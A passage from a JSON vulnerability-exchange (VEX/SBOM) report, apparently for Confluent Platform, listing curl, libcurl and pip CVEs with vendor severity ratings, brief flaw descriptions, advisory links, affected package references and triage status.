          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-8458",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "description": "libcurl might in some circumstances reuse the wrong connection when asked to\ndo Negotiate-authenticated ones, even when they are set to use different\n'services'.\n\nlibcurl features a pool of recent connections so that subsequent requests can\nreuse an existing connection to avoid overhead.\n\nWhen reusing a connection a range of criteria must be met. Due to a logical\nerror in the code, a request that was issued by an application could\nwrongfully reuse an existing connection to the same server that was\nauthenticated using different services.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-8458"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-8458"
        },
        {
          "url": "https://curl.se/L7HzKXisfJ/CVE-2026-8458.md"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8458.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8458.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-88c6-6jfq-mm4q"
        },
        {
          "url": "https://hackerone.com/reports/3721183"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8458"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8487-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-8458"
        }
      ],
      "published": "2026-07-03T07:16:24+00:00",
      "updated": "2026-07-07T23:12:17+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-8643",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        }
      ],
      "cwes": [
        22
      ],
      "description": "pip would treat console_scripts and gui_scripts as paths instead of file names without sanitizing the resolved absolute path to the installation directory, leading to entry points being installed outside the installation directory.",
      "recommendation": "Upgrade pip to version 26.1.2",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-8643"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/06/01/5"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33313"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34374"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34456"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34739"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34740"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34741"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34748"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34749"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34750"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34752"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34756"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34758"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34760"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34765"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34772"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34773"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34774"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34775"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34776"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34777"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34778"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34780"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34891"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36193"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36315"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37275"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37283"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42078"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42079"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42132"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42144"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42644"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50479"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54760"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56347"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-8643"
        },
        {
          "url": "https://bugzilla.redhat.com/2460927"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460927"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-8643"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-36193.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:36315"
        },
        {
          "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pip/PYSEC-2026-196.yaml"
        },
        {
          "url": "https://github.com/pypa/pip"
        },
        {
          "url": "https://github.com/pypa/pip/commit/8eb178480bd1a2b223f509fc430796b265158dfb"
        },
        {
          "url": "https://github.com/pypa/pip/pull/14000"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-8643.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-36315.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/YV63UET5D3OOJY7O4M5XCVYO2YM4NBYJ"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/YV63UET5D3OOJY7O4M5XCVYO2YM4NBYJ/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8643"
        },
        {
          "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-8643.json"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-8643"
        }
      ],
      "published": "2026-06-01T17:17:35+00:00",
      "updated": "2026-08-19T12:18:40+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/pip@26.0.1",
          "versions": [
            {
              "version": "26.0.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:pypi/pip@26.0.1"
        }
      ]
    },
    {
      "id": "CVE-2026-8924",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 9.1,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "description": "A flaw in curl\u2019s cookie parsing logic allows a malicious HTTP server to set\n'super cookies' that bypass the Public Suffix List check. This enables an\nattacker-controlled origin to inject cookies that curl subsequently scopes and\ntransmits to unrelated third-party domains.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-8924"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-8924"
        },
        {
          "url": "https://curl.se/L7HzKXisfJ/CVE-2026-8924.md"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8924.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8924.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-hm6c-rc5h-32m9"
        },
        {
          "url": "https://hackerone.com/reports/3733905"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8924"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8487-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-8924"
        }
      ],
      "published": "2026-07-03T07:16:24+00:00",
      "updated": "2026-07-07T23:06:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
